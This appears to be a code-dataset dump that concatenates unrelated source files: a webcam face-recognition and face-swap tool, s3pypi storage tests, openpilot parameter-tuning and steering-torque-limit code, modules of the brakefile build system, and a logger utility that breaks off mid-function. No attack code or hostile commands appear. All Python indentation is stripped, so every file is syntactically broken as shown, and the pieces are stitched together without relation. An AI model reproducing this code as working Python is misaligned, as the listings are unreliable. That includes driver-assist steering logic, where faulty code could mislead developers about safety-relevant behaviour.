cv2.circle(eye, (x, y), 1, (0, 0, 255), -1)
#cv2.imshow("eye", eye)
#cv2.waitKey(0)
points = np.vstack((points, [bbox[0][0] + x, bbox[0][1] + y])) # absolute coordinates
except (IndexError, ZeroDivisionError):
points = np.vstack((points, [int((bbox[0][0] + bbox[3][0]) / 2), int((bbox[0][1] + bbox[3][1]) / 2)]))
"""contours, _ = cv2.findContours(eye, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea)
try:
m = cv2.moments(contours[-2])
x = int(m["m10"] / m["m00"])
y = int(m["m01"] / m["m00"])
eye = cv2.cvtColor(eye, cv2.COLOR_GRAY2BGR)
cv2.circle(eye, (x, y), 1, (0, 0, 255), -1)
cv2.drawContours(eye, contours[-2], -1, (255, 0, 0), 1)
cv2.imshow("eye", eye)
cv2.waitKey(0)
points = np.vstack((points, [bbox[0][0] + x, bbox[0][1] + y])) # absolute coordinates
except (IndexError, ZeroDivisionError):
points = np.vstack((points, [int((bbox[0][0] + bbox[3][0])/2), int((bbox[0][1] + bbox[3][1])/2)]))"""
"""iris = cv2.HoughCircles(eye, cv2.HOUGH_GRADIENT, 1, 100,
param1=20,
param2=10,
minRadius=5,
maxRadius=20)
if iris is not None:
iris = np.uint16(np.around(iris))
eye = cv2.cvtColor(eye, cv2.COLOR_GRAY2BGR)
cv2.circle(eye, (iris[0][0][0], iris[0][0][1]), iris[0][0][2], (0, 255, 0), 1)
cv2.circle(eye, (iris[0][0][0], iris[0][0][1]), 1, (0, 0, 255), -1)
cv2.imshow("eye", eye)
cv2.waitKey(0)
points = np.vstack((points, [bbox[0][0] + iris[0][0][0], bbox[0][1] + iris[0][0][1]])) #add eye centerpoint
else:
points = np.vstack((points, [int((bbox[0][0] + bbox[3][0])/2), int((bbox[0][1] + bbox[3][1])/2)]))
#add center of bbox"""
return points
def warp(src_img, src_points, src_bbox, input_img, input_points):
result_img = np.zeros(src_img.shape, dtype=src_img.dtype)
#result_img = src_img.copy()
src_delaunay = Delaunay(src_points) # create Delaunay triangles to warp to
triangle_affines = np.array(list(get_affine_transform(src_delaunay.simplices, input_points, src_points)))
# create transform matrices to warp input points to source triangles
src_bbox_points = np.array([(x, y) for x in range(src_bbox[0][0], src_bbox[3][0] + 1)
for y in range(src_bbox[0][1], src_bbox[3][1] + 1)])
# create an array of all coordinates in source face area
src_indicies = src_delaunay.find_simplex(src_bbox_points) # returns triangle index for each point, -1 for none
"""lefteye_points = src_points[36:41]
lefteye_Delaunay = Delaunay(lefteye_points)
lefteye_indicies = lefteye_Delaunay.find_simplex(src_bbox_points)
righteye_points = src_points[42:47]
righteye_Delaunay = Delaunay(righteye_points)
righteye_indicies = righteye_Delaunay.find_simplex(src_bbox_points)"""
mouth_points = src_points[60:67]
mouth_Delaunay = Delaunay(mouth_points)
mouth_indicies = mouth_Delaunay.find_simplex(src_bbox_points)
for index in range(len(src_indicies)):
if (mouth_indicies[index] != -1): # (lefteye_indicies[index] != -1) or (righteye_indicies[index] != -1) or
src_indicies[index] = -1
for triangle_index in range(len(src_delaunay.simplices)): # for each triangle
triangle_points = src_bbox_points[src_indicies == triangle_index] # for the points in the triangle
num_points = len(triangle_points) # get the number of points
out_points = np.dot(triangle_affines[triangle_index], np.vstack((triangle_points.T, np.ones(num_points))))
# perform affine transform T = M.[x,y,1]^T to create triangle of input in the source
x, y = triangle_points.T # transpose [[x1,y1], [x2,y2], ...] to [x1, x2, ...], [y1, y2, ...] src_triangle coord
warp_img = cv2.warpAffine(input_img, triangle_affines[triangle_index], (input_img.shape[1], input_img.shape[0]))
#cv2.imshow("warp_img", warp_img)
result_img[y, x] = warp_img[y, x]
#cv2.imshow("result_img", result_img)
#cv2.waitKey(20) # these show the process for each section
return result_img
def get_affine_transform(input_simplices, input_points, src_points):
for triangle in input_simplices: # for each triangle
src_triangle = np.float32(src_points[triangle])
input_triangle = np.float32(input_points[triangle])
mat = cv2.getAffineTransform(input_triangle, src_triangle) # get the transform matrix
#mat = cv2.getAffineTransform(src_triangle, input_triangle) # get the transform matrix
yield mat
def draw(img): # draws facial points, Delaunay triangles and bounding box
points, bbox, _ = find(img)
if points is None or bbox is None:
print("no face to draw")
return img
left_bbox = [[min(points[36:41, 0]), min(points[36:41, 1])], [max(points[36:41, 0]), min(points[36:41, 1])],
[min(points[36:41, 0]), max(points[36:41, 1])], [max(points[36:41, 0]), max(points[36:41, 1])]]
right_bbox = [[min(points[42:47, 0]), min(points[42:47, 1])], [max(points[42:47, 0]), min(points[42:47, 1])],
[min(points[42:47, 0]), max(points[42:47, 1])], [max(points[42:47, 0]), max(points[42:47, 1])]]
bboxs = [bbox, left_bbox, right_bbox]
for bbox in bboxs:
cv2.line(img, tuple(bbox[0]), tuple(bbox[1]), (0, 0, 255), 2)
cv2.line(img, tuple(bbox[0]), tuple(bbox[2]), (0, 0, 255), 2)
cv2.line(img, tuple(bbox[2]), tuple(bbox[3]), (0, 0, 255), 2)
cv2.line(img, tuple(bbox[1]), tuple(bbox[3]), (0, 0, 255), 2)
for point in points:
cv2.circle(img, (point[0], point[1]), 2, (0, 255, 0), -1)
triangles = Delaunay(points)
for triangle in points[triangles.simplices]:
cv2.line(img, tuple(triangle[0]), tuple(triangle[1]), (255, 255, 255), 1)
cv2.line(img, tuple(triangle[1]), tuple(triangle[2]), (255, 255, 255), 1)
cv2.line(img, tuple(triangle[2]), tuple(triangle[0]), (255, 255, 255), 1)
return img
```
#### File: JohnWatson96/Image-Processing-Face-Recognition/gui_functions.py
```python
import cv2
import numpy as np
import face_functions as face
from PyQt5.QtWidgets import (QApplication, QMainWindow, QPushButton, QWidget, QInputDialog, QLineEdit, QGridLayout,
QLabel)
from PyQt5.QtGui import QPixmap, QImage
from PyQt5.QtCore import Qt, pyqtSignal, QThread, pyqtSlot
import glob
#globals
recognise = False
swap = None
save = False
cam = 0
# initialisation
input_imgs = []
input_names = []
for file in glob.glob("*.jpg"):
input_imgs.append(cv2.imread(file))
input_names.append(file[:-4])
input_pointses = np.zeros((len(input_imgs), 70, 2), dtype=np.uint32)
input_bboxs = np.zeros((len(input_imgs), 4, 2), dtype=np.uint32)
input_shapes = []
input_descriptors = []
#input_points, input_bbox, input_shape = face.find(input_imgs[3]) # testing
for index in range(0, len(input_imgs)):
input_points, input_bbox, input_shape = face.find(input_imgs[index])
input_pointses[index] = input_points
input_bboxs[index] = input_bbox
input_shapes.append(input_shape)
input_descriptors.append(face.recognise(input_imgs[index], input_shape))
#cv2.imshow("swap", face.swap(input_imgs[3], input_pointses[3], input_bboxs[3], input_imgs[0], input_pointses[0]))
def closecam():
global cam
cam.release()
return
def frame_operation(frame):
global recognise
global swap
global save
if save:
cv2.imwrite(file, frame)
save = False
if recognise:
_, frame_bbox, frame_shape = face.find(frame)
if frame_bbox or frame_shape is not None:
frame_descriptor = face.recognise(frame, frame_shape)
name_index = face.match(frame_descriptor, input_descriptors)
if name_index is not None:
name = input_names[name_index]
frame = face.draw(frame)
cv2.putText(frame, name, tuple(frame_bbox[2]), cv2.FONT_HERSHEY_DUPLEX, 2.0, (255, 0, 0), 2)
else:
frame = face.draw(frame)
cv2.putText(frame, "Not Recognised", (0, 480), cv2.FONT_HERSHEY_DUPLEX, 2.0, (255, 0, 0), 2)
else:
cv2.putText(frame, "No Face Detected", (0, 480), cv2.FONT_HERSHEY_DUPLEX, 2.0, (255, 0, 0), 2)
if swap is not None:
frame_points, frame_bbox, _ = face.find(frame)
frame = face.swap(frame, frame_points, frame_bbox, input_imgs[swap], input_pointses[swap])
return frame
class Thread(QThread):
changePixmapIn = pyqtSignal(QImage, name='In')
changePixmapOut = pyqtSignal(QImage, name='Out')
def run(self):
global cam
cam = cv2.VideoCapture(0)
while True:
ret, frame = cam.read()
if ret:
rgbImage = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
h, w, ch = rgbImage.shape
bytesPerLine = ch * w
convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)
p = convertToQtFormat.scaled(640, 480, Qt.KeepAspectRatio)
self.changePixmapIn.emit(p)
frame = frame_operation(frame)
if ret:
rgbImage = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
h, w, ch = rgbImage.shape
bytesPerLine = ch * w
convertToQtFormat = QImage(rgbImage.data, w, h, bytesPerLine, QImage.Format_RGB888)
p = convertToQtFormat.scaled(640, 480, Qt.KeepAspectRatio)
self.changePixmapOut.emit(p)
# -----------Video Capture--------------------#
# GUI
class AppWindow(QMainWindow):
def getText(self):
global file
text, okPressed = QInputDialog.getText(self, "Get text", "Your name:", QLineEdit.Normal, "")
if okPressed and text != '':
global save
save = True
file = text + ".jpg"
# Define Button Presses
def Button1_pressed(self):
global recognise
recognise = ~recognise
def Button2_pressed(self):
global swap
if swap is None:
swap = 0
elif swap < len(input_imgs) - 1:
swap = swap + 1
else:
swap = None
if swap is not None:
self.Name.setText(input_names[swap])
else:
self.Name.setText("")
def Button3_pressed(self):
self.getText()
# Initilize main window
def __init__(self, *args, **kwargs):
super(AppWindow, self).__init__(*args, **kwargs)
# Set Title and window dimensions
self.setWindowTitle("Facial Recognition Project")
# -----------Buttons-------------------------#
# Create buttons
self.Button1 = QPushButton()
self.Button2 = QPushButton()
self.Button3 = QPushButton()
self.Name = QLabel()
# Label Buttons
self.Button1.setText('Who am I?')
self.Button2.setText('Swap my face!')
self.Button3.setText('Remember me!')
# Place buttons
self.layout = QGridLayout()
self.layout.addWidget(self.Button1, 3, 3)
self.layout.addWidget(self.Button2, 4, 3)
self.layout.addWidget(self.Button3, 5, 3)
self.layout.addWidget(self.Name, 3, 5)
# Connect buttons
self.Button1.clicked.connect(self.Button1_pressed)
self.Button2.clicked.connect(self.Button2_pressed)
self.Button3.clicked.connect(self.Button3_pressed)
# -----------Images-------------------------#
self.labelIn = QLabel(self)
self.pixmapIn = QPixmap()
self.resize(self.pixmapIn.width(), self.pixmapIn.height())
self.layout.addWidget(self.labelIn, 0, 0, 2, 2)
self.labelOut = QLabel(self)
self.pixmapOut = QPixmap()
self.resize(self.pixmapOut.width(), self.pixmapOut.height())
self.layout.addWidget(self.labelOut, 0, 4, 2, 6)
# Lay widgets location
self.widget = QWidget()
self.widget.setLayout(self.layout)
self.setCentralWidget(self.widget)
th = Thread(self)
th.changePixmapIn.connect(self.setImageIn)
th.changePixmapOut.connect(self.setImageOut)
th.start()
# Image Update
@pyqtSlot(QImage, name='In')
def setImageIn(self, image):
# Input image
self.labelIn.setPixmap(QPixmap.fromImage(image))
@pyqtSlot(QImage, name='Out')
def setImageOut(self, frame):
# Output image
self.labelOut.setPixmap(QPixmap.fromImage(frame))
``` |
{
"source": "johnwatsonncr/s3pypi",
"score": 2
} |
#### File: tests/unit/test_storage.py
```python
from s3pypi.package import Package
from s3pypi.storage import S3Storage
def test_secret_in_s3_key(secret):
storage = S3Storage("appstrakt-pypi", secret)
package = Package("test-0.1.0", [])
assert secret in storage._object(package, "index.html").key
assert storage.acl == "public-read"
def test_private_s3_key(private):
storage = S3Storage("appstrakt-pypi", private=private)
assert storage.acl == "private"
``` |
{
"source": "johnwaynehacker/openpilotsubaru",
"score": 3
} |
#### File: openpilotsubaru/selfdrive/rtt_cl_interface.py
```python
import pickle
import sys
def isDigit(x):
try:
float(x)
return True
except (ValueError, TypeError) as e:
return False
rt_tuning_file = '/data/.openpilot_rtt_params.pkl'
# Loop forever (ctrl-C and then Enter key to end script)
while 1:
with open(rt_tuning_file, "rb") as f_read:
rtt_params = pickle.load(f_read)
key_list = []
print('')
cnt = 0
for key in sorted(rtt_params.keys()):
print('{0}: {1}'.format(cnt, key))
key_list.append(key)
cnt += 1
print('')
sys.stdin = open('/dev/tty')
entry = raw_input('Enter parameter number to modify: ')
# Data checking
try:
int(entry)
except ValueError:
print ('Please re-enter a valid parameter number.')
continue
param_num = int(entry)
if param_num < 0 or param_num >= len(key_list):
print('Please re-enter a valid parameter number.')
continue
print('')
print('Old value:')
key = key_list[param_num]
original_param_is_list = False
if isDigit(rtt_params[key]):
print(' {0}: {1:.6f}'.format(key, rtt_params[key]))
else:
print(' {0}: {1}'.format(key, rtt_params[key]))
original_param_is_list = True
print('')
entry = raw_input('Enter new value: ')
print('')
#print(entry)
# Check to see if a list was entered... basically anything with a comma.
if ',' in entry or ('[' in entry and ']' in entry):
if not original_param_is_list:
print('Original value was float, new value entered is a list. Try again.')
print('')
continue
entry = entry.replace('[','').replace(']','')
processed_entry = [float(s) for s in entry.split(',') if isDigit(s)]
if len(processed_entry) == 0:
print('Invalid list entry. Try again.')
print('')
continue
if len(processed_entry) != len(rtt_params[key]):
print('New list length does not match length of original list. Try again.')
print('')
continue
elif isDigit(entry):
if original_param_is_list:
print('Original value was list, new value entered is a float. Try again.')
print('')
continue
processed_entry = float(entry)
else:
print('Invalid value entered. Try again.')
print('')
continue
print('New value:')
if isDigit(processed_entry):
print(' {0}: {1:.6f}'.format(key, processed_entry))
else:
# must be a list.
print(' {0}: {1}'.format(key, processed_entry))
print('')
confirm = raw_input('Type "y" to confirm + save or any other key to escape: ')
if confirm.lower() == 'y':
print('Confirmed. Writing to real-time tuning file.')
print('')
# Set it to this value
rtt_params[key] = processed_entry
# Save the file
with open(rt_tuning_file, "wb") as f_write:
pickle.dump(rtt_params, f_write, -1) # Dump to file with highest protocol (fastest)
else:
print('Escaped!')
print('')
``` |
{
"source": "johnwaynerobot/openpilot",
"score": 2
} |
#### File: selfdrive/car/__init__.py
```python
from common.numpy_fast import clip
def dbc_dict(pt_dbc, radar_dbc, chassis_dbc=None):
return {'pt': pt_dbc, 'radar': radar_dbc, 'chassis': chassis_dbc}
#2018.09.04 #TODO need to define one where command steering angle instead of torque
def apply_std_steer_torque_limits(apply_torque, apply_torque_last, driver_torque, LIMITS):
# limits due to driver torque
driver_max_torque = LIMITS.STEER_MAX + (LIMITS.STEER_DRIVER_ALLOWANCE + driver_torque * LIMITS.STEER_DRIVER_FACTOR) * LIMITS.STEER_DRIVER_MULTIPLIER
driver_min_torque = -LIMITS.STEER_MAX + (-LIMITS.STEER_DRIVER_ALLOWANCE + driver_torque * LIMITS.STEER_DRIVER_FACTOR) * LIMITS.STEER_DRIVER_MULTIPLIER
max_steer_allowed = max(min(LIMITS.STEER_MAX, driver_max_torque), 0)
min_steer_allowed = min(max(-LIMITS.STEER_MAX, driver_min_torque), 0)
apply_torque = clip(apply_torque, min_steer_allowed, max_steer_allowed)
# slow rate if steer torque increases in magnitude
if apply_torque_last > 0:
apply_torque = clip(apply_torque, max(apply_torque_last - LIMITS.STEER_DELTA_DOWN, -LIMITS.STEER_DELTA_UP),
apply_torque_last + LIMITS.STEER_DELTA_UP)
else:
apply_torque = clip(apply_torque, apply_torque_last - LIMITS.STEER_DELTA_UP,
min(apply_torque_last + LIMITS.STEER_DELTA_DOWN, LIMITS.STEER_DELTA_UP))
return int(round(apply_torque))
``` |
{
"source": "johnwbyrd/brakefile",
"score": 2
} |
#### File: bkl/interpreter/passes.py
```python
import os.path
import logging
logger = logging.getLogger("bkl.pass")
import simplify
import analyze
import bkl.vartypes
import bkl.expr
import bkl.model
import bkl.vartypes
from bkl.error import Error, NonConstError, TypeError
from bkl.expr import RewritingVisitor
from bkl.utils import memoized
def detect_potential_problems(model):
"""
Run several warnings-generating steps, to detect common problems.
"""
analyze.detect_self_references(model)
analyze.detect_unused_vars(model)
analyze.detect_missing_generated_outputs(model)
def normalize_and_validate_bool_subexpressions(model):
"""
Normalizes bool expressions, i.e. ensures the conditions are valid bools.
variables' values with respect to their types.
"""
logger.debug("checking boolean expressions")
for var in model.all_variables():
bkl.vartypes.normalize_and_validate_bool_subexpressions(var.value)
def normalize_vars(model):
"""
Normalizes variables' values with respect to their types. For example,
changes non-list value expressions for lists into single-item lists.
"""
logger.debug("normalizing variables")
for var in model.all_variables():
# if the type of the variable wasn't determined yet, guess it
if var.type is bkl.vartypes.TheAnyType:
var.type = bkl.vartypes.guess_expr_type(var.value)
# normalize the value for the type
var.value = var.type.normalize(var.value)
def validate_vars(model):
"""
Validates variables' values with respect to their types, i.e. check
the correctness of the values. It is assumed that normalize_vars() was
executed beforehand.
"""
logger.debug("checking types of variables")
for var in model.all_variables():
try:
var.type.validate(var.value)
except TypeError as err:
# TODO: add this as a remark to the error object
err.msg = "variable \"%s\" (%s): %s" % (var.name, var.type, err.msg)
raise
def remove_disabled_model_parts(model, toolset):
"""
Removes disabled targets, source files etc. from the model. Disabled parts
are those with ``condition`` variable evaluating to false.
"""
def _should_remove(part, allow_dynamic):
try:
return not part.should_build()
except NonConstError:
if allow_dynamic:
return False
else:
raise
def _remove_from_list(parts, allow_dynamic):
to_del = []
for p in parts:
if _should_remove(p, allow_dynamic):
to_del.append(p)
for p in to_del:
logger.debug("removing disabled %s from %s", p, p.parent)
parts.remove(p)
for module in model.modules:
targets_to_del = []
for target in module.targets.itervalues():
if _should_remove(target, allow_dynamic=True):
targets_to_del.append(target)
continue
_remove_from_list(target.sources, allow_dynamic=True)
_remove_from_list(target.headers, allow_dynamic=True)
for target in targets_to_del:
logger.debug("removing disabled %s", target)
del module.targets[target.name]
# remove any empty submodules:
mods_to_del = []
for module in model.modules:
if module is model.top_module:
continue
if not list(module.submodules) and not module.targets:
logger.debug("removing empty %s", module)
mods_to_del.append(module)
continue
mod_toolsets = module.get_variable_value("toolsets")
if toolset not in mod_toolsets.as_py():
logger.debug("removing %s, because it isn't for toolset %s (is for: %s)",
module, toolset, mod_toolsets.as_py())
mods_to_del.append(module)
for module in mods_to_del:
model.modules.remove(module)
# and remove unused settings too:
settings_to_del = []
for sname, setting in model.settings.iteritems():
if _should_remove(setting, allow_dynamic=False):
settings_to_del.append(sname)
for sname in settings_to_del:
logger.debug("removing setting %s", sname)
del model.settings[sname]
class PathsNormalizer(RewritingVisitor):
"""
Normalizes relative paths so that they are absolute. Paths relative to
@srcdir are rewritten in terms of @top_srcdir. Paths relative to @builddir
are translated in toolset-specific way. This is needed so that cross-module
variables and paths uses produce correct results.
You must call :meth:`set_context()` to associate a module or target before
calling :meth:`visit()`. Paths relative to @builddir can only be processed
if the context was set to a target.
"""
def __init__(self, project, toolset=None):
super(PathsNormalizer, self).__init__()
self.toolset = toolset
self.project = project
self.module = self.target = None
self.top_srcdir = os.path.abspath(project.top_module.srcdir)
def set_context(self, context):
"""
Sets context to perform the translation in. This is either a module or
target from the model.
Note that @builddir cannot be translated without a target context.
"""
if isinstance(context, bkl.model.Target):
self.module = context.parent
self.target = context
else:
self.module = context
self.target = None
@memoized
def _src_prefix(self, source_file):
srcdir = os.path.abspath(self.project.get_srcdir(source_file))
prefix = os.path.relpath(srcdir, start=self.top_srcdir)
logger.debug('translating paths from %s with prefix "%s"', source_file, prefix)
if prefix == ".":
return None
else:
lst = prefix.split(os.path.sep)
return [bkl.expr.LiteralExpr(i) for i in lst]
@memoized
def _builddir(self, target):
builddir = self.toolset.get_builddir_for(target)
logger.debug('translating @builddir paths of %s into %s', target, builddir)
return builddir
def path(self, e):
if e.anchor == bkl.expr.ANCHOR_BUILDDIR and self.toolset is not None:
if self.target is None:
raise Error("@builddir references are not allowed outside of targets", pos=e.pos)
bdir = self._builddir(self.target)
e = bkl.expr.PathExpr(bdir.components + e.components,
bdir.anchor, bdir.anchor_file,
pos=e.pos)
if e.anchor == bkl.expr.ANCHOR_SRCDIR:
assert self.module is not None
if e.anchor_file:
source_file = e.anchor_file
elif e.pos and e.pos.filename:
source_file = e.pos.filename
else:
source_file = self.module.source_file
prefix = self._src_prefix(source_file)
components = e.components
if prefix is not None:
# Don't mess the path if it starts with user setting and so
# should be treated as absolute.
if not e.is_external_absolute():
components = prefix + components
e = bkl.expr.PathExpr(components,
bkl.expr.ANCHOR_TOP_SRCDIR, None,
pos=e.pos)
return e
def normalize_paths_in_model(model, toolset):
"""
Normalizes relative paths so that they are absolute. Paths relative to
@srcdir are rewritten in terms of @top_srcdir. Paths relative to @builddir
are translated in toolset-specific way. This is needed so that cross-module
variables and paths uses produce correct results.
Performs the normalization in-place for the whole model.
"""
logger.debug("translating relative paths into absolute")
if toolset is not None:
toolset = bkl.api.Toolset.get(toolset)
norm = PathsNormalizer(model, toolset)
for module in model.modules:
norm.set_context(module)
for var in module.variables.itervalues():
var.value = norm.visit(var.value)
for target in module.targets.itervalues():
norm.set_context(target)
for var in target.all_variables():
var.value = norm.visit(var.value)
def make_variables_for_missing_props(model, toolset):
"""
Creates variables for properties that don't have variables set yet.
"""
logger.debug("adding properties' default values (%s)" % model)
model.make_variables_for_missing_props(toolset)
for part in model.child_parts():
make_variables_for_missing_props(part, toolset)
def simplify_exprs(model):
"""
Simplify expressions in the model. This does "cheap" simplifications such
as merging concatenated literals, recognizing always-false conditions,
eliminating unnecessary variable references (turn ``foo=$(x);bar=$(foo)``
into ``bar=$(x)``) etc.
"""
logger.debug("simplifying expressions")
simplifier = simplify.BasicSimplifier()
for var in model.all_variables():
var.value = simplifier.visit(var.value)
def eliminate_superfluous_conditionals(model):
"""
Removes as much of conditional content as possible. This involves doing
as many optimizations as possible, even if the calculation is relatively
expensive (compared to simplify_exprs()).
"""
iteration = 1
simplifier = simplify.ConditionalsSimplifier()
while True:
logger.debug("removing superfluous conditional expressions: pass %i", iteration)
modified = False
for var in model.all_variables():
old = var.value
var.value = simplifier.visit(var.value)
if old is not var.value:
logger.debug("new pass triggered because of this change: {%s} -> {%s}", old, var.value)
modified = True
if modified:
iteration += 1
else:
break
```
#### File: bkl/interpreter/simplify.py
```python
from bkl.expr import *
from bkl.error import NonConstError
class BasicSimplifier(RewritingVisitor):
"""
Simplify expression *e*. This does "cheap" simplifications such
as merging concatenated literals, recognizing always-false conditions,
eliminating unnecessary variable references (turn ``foo=$(x);bar=$(foo)``
into ``bar=$(x)``) etc.
"""
def list(self, e):
new, changed = self._process_children(e.items)
if not changed:
return e
if len(new):
return ListExpr(new, pos=e.pos)
else:
return NullExpr(pos=e.pos)
def concat(self, e):
# merge concatenated literals:
items, changed = self._process_children(e.items)
if not changed:
return e
if len(items) == 0:
return NullExpr(pos=e.pos)
out = [items[0]]
for i in items[1:]:
if isinstance(i, LiteralExpr) and isinstance(out[-1], LiteralExpr):
out[-1] = LiteralExpr(out[-1].value + i.value)
else:
out.append(i)
if len(out) == 1:
return out[0]
else:
return ConcatExpr(out, pos=e.pos)
def reference(self, e):
# Simple reference can be replaced with the referenced value. Do this
# for (scalar) literals and other references only, though -- if the
# value is e.g. a list, we want to keep it as a variable to avoid
# duplication of large values.
#
# NOTE: We *must not* do this for PathExpr instances with @builddir
# anchors, because they are replaced with absolute versions only
# after a toolset-specific model is made. But it doesn't make
# send to substitute paths, generally speaking, they tend to be
# larger.
ref = e.get_value()
if (isinstance(ref, LiteralExpr) or
isinstance(ref, ReferenceExpr) or
isinstance(ref, BoolValueExpr)):
return self.visit(ref)
else:
return e
def path(self, e):
components, changed = self._process_children(e.components)
if not changed:
return e
if not components:
return NullExpr(pos=e.pos)
else:
return PathExpr(components, e.anchor, e.anchor_file, pos=e.pos)
def bool(self, e):
left = self.visit(e.left)
right = None if e.right is None else self.visit(e.right)
if left is e.left and right is e.right:
return e
else:
if (isinstance(left, NullExpr) and
(right is None or isinstance(right, NullExpr))):
return NullExpr(pos=e.pos)
else:
return BoolExpr(e.operator, left, right, pos=e.pos)
def if_(self, e):
cond = self.visit(e.cond)
yes = self.visit(e.value_yes)
no = self.visit(e.value_no)
if cond is e.cond and yes is e.value_yes and no is e.value_no:
return e
else:
if isinstance(yes, NullExpr) and isinstance(no, NullExpr):
return NullExpr(pos=e.pos)
else:
return IfExpr(cond, yes, no, pos=e.pos)
class ConditionalsSimplifier(BasicSimplifier):
"""
More advanced simplifier class, eliminates const boolean expressions
and their consequences (such as null items in lists).
"""
def bool(self, e):
e = super(ConditionalsSimplifier, self).bool(e)
if not isinstance(e, BoolExpr):
return e
op = e.operator
try:
# Note: any of the as_py() calls below may throw, because the
# subexpression may be non-const. That's OK, it just means we
# cannot simplify the expression yet, so we just catch that
# particular exception, NonConstError, later.
if op == BoolExpr.NOT:
return BoolValueExpr(not e.left.as_py(), pos=e.pos)
elif op == BoolExpr.AND:
# We can simplify AND expressions even if one part is undeterminable
left = right = None
try:
left = e.left.as_py()
except NonConstError:
pass
try:
right = e.right.as_py()
except NonConstError:
pass
if left is not None and right is not None:
return BoolValueExpr(left and right, pos=e.pos)
elif left is not None and left == True:
return e.right
elif right is not None and right == True:
return e.left
elif op == BoolExpr.OR:
# We can simplify OR expressions even if one part is undeterminable
left = right = None
try:
left = e.left.as_py()
if left:
return BoolValueExpr(True, pos=e.pos)
except NonConstError:
pass
try:
right = e.right.as_py()
if right:
return BoolValueExpr(True, pos=e.pos)
except NonConstError:
pass
if left is not None and right is not None:
assert (left or right) == False
return BoolValueExpr(False, pos=e.pos)
elif op == BoolExpr.EQUAL:
return BoolValueExpr(e.left.as_py() == e.right.as_py())
elif op == BoolExpr.NOT_EQUAL:
return BoolValueExpr(e.left.as_py() != e.right.as_py())
except NonConstError:
pass
return e
def if_(self, e):
e = super(ConditionalsSimplifier, self).if_(e)
if not isinstance(e, IfExpr):
return e
try:
if e.cond.as_py():
return e.value_yes
else:
return e.value_no
except NonConstError:
return e
def simplify(e):
"""
Simplifies given expression as much as possible, employing all tricks in
the book.
Currently, that means applying ConditionalsSimplifier on it.
"""
return ConditionalsSimplifier().visit(e)
```
#### File: projects/generated_files/make_gensrc.py
```python
import sys
import os.path
if len(sys.argv) != 4:
raise RuntimeError("invalid arguments, usage: %s --<both|header|source> output input" % sys.argv[0])
def gen_header(outname):
dirname, basename = os.path.split(outname)
name, ext = os.path.splitext(basename)
with file(os.path.join(dirname, name + ".h"), "wt") as outf:
outf.write("extern const char *get_%s_body();\n" % name)
def gen_source(outname, msg):
dirname, basename = os.path.split(outname)
name, ext = os.path.splitext(basename)
with file(os.path.join(dirname, name + ".cpp"), "wt") as outf:
with file(msg, "rt") as inpf:
outf.write("const char *get_%s_body() { return \"" % name + inpf.read().rstrip('\n') + "\"; }\n")
if sys.argv[1] == "--both":
gen_header(sys.argv[2])
gen_source(sys.argv[2], sys.argv[3])
elif sys.argv[1] == "--header":
gen_header(sys.argv[2])
elif sys.argv[1] == "--source":
gen_source(sys.argv[2], sys.argv[3])
else:
raise RuntimeError("invalid argument %s" % sys.argv[1])
```
#### File: brakefile/tests/test_plumbing.py
```python
import os.path
import bkl.interpreter
import bkl.dumper
import bkl.io
from bkl.expr import BoolValueExpr, ListExpr, LiteralExpr, ConcatExpr, NullExpr
import projects
projects_dir = os.path.dirname(projects.__file__)
class InterpreterForTestSuite(bkl.interpreter.Interpreter):
def generate(self):
pass
def test_model_cloning():
i = InterpreterForTestSuite()
i.process_file(os.path.join(projects_dir, 'submodules', 'main.bkl'))
model = i.model
model_copy = model.clone()
model_txt = bkl.dumper.dump_project(model)
model_copy_txt = bkl.dumper.dump_project(model_copy)
assert model_txt == model_copy_txt
def test_file_io_unix(tmpdir):
p = tmpdir.join("textfile")
f = bkl.io.OutputFile(str(p), bkl.io.EOL_UNIX)
f.write("one\ntwo\n")
f.commit()
text_read = p.read("rb")
assert text_read == "one\ntwo\n"
def test_file_io_win(tmpdir):
p = tmpdir.join("textfile")
f = bkl.io.OutputFile(str(p), bkl.io.EOL_WINDOWS)
f.write("one\ntwo\n")
f.commit()
text_read = p.read("rb")
assert text_read == "one\r\ntwo\r\n"
def test_expr_as_bool():
bool_yes = BoolValueExpr(True)
bool_no = BoolValueExpr(False)
empty_list = ListExpr([])
a_list = ListExpr([bool_yes, bool_no])
literal = LiteralExpr("foo")
empty_literal = LiteralExpr("")
concat = ConcatExpr([empty_literal, literal, literal])
empty_concat = ConcatExpr([empty_literal, empty_literal])
assert bool(bool_yes)
assert bool(a_list)
assert bool(literal)
assert bool(concat)
assert not bool(bool_no)
assert not bool(empty_list)
assert not bool(empty_literal)
assert not bool(empty_concat)
def test_list_expr_iterator():
bool_yes = BoolValueExpr(True)
bool_no = BoolValueExpr(False)
empty_list = ListExpr([])
a_list = ListExpr([bool_yes, bool_no])
assert len(empty_list) == 0
assert not empty_list
assert len(a_list) == 2
assert a_list
assert list(a_list) == [bool_yes, bool_no]
null = NullExpr()
assert not null
assert len(null) == 0
``` |
{
"source": "johnwcchau/ABC",
"score": 3
} |
#### File: johnwcchau/ABC/util.py
```python
from contextlib import redirect_stdout, redirect_stderr
import re
class Logger:
def __init__(self):
self.ws = None
self.ioloop = None
def log(self, status=-1000, msg=None, param=None):
if self.ws and self.ioloop:
self.ioloop.add_callback(self.ws.send_result, status, msg, param)
def working(self, msg=None):
self.log(1, msg)
def progress(self, msg=None, progress=0):
if isinstance(progress, float) or isinstance(progress, int):
self.log(2, msg, {"progress": progress})
elif isinstance(progress, dict):
self.log(2, msg, progress)
else:
self.log(2, msg)
def finished(self, msg=None, param=None):
self.log(0, msg, param)
def busy(self):
self.log(-997, "Model is busy, try again later")
def error(self, msg=None):
self.log(-998, msg)
def invalid(self, msg='Invalid request'):
self.log(-999, msg)
def stream(self, stream, msg):
self.log(stream, msg)
class outwriter(object):
def __init__(self, log:Logger):
self.log = log
pass
def write(self, data):
self.log.stream(2, repr(data))
def flush(self):
pass
class errwriter(object):
def __init__(self, log:Logger):
self.log = log
def tqnum(s:str)->float:
if not s: return 1
num = 1
try:
if s[-1] in ["K", "M", "G", "T"]:
num = float(s[:-1])
else:
num = float(s)
if s[-1]=="K":
num *= 1024
elif s[-1]=="M":
num *= 1024 * 1024
elif s[-1]=="G":
num *= 1024 * 1024 * 1024
elif s[-1]=="T":
num *= 1024*1024*1024*1024
except Exception:
return 1
pass
def write(self, data):
#
# try to capture tqdm output
#
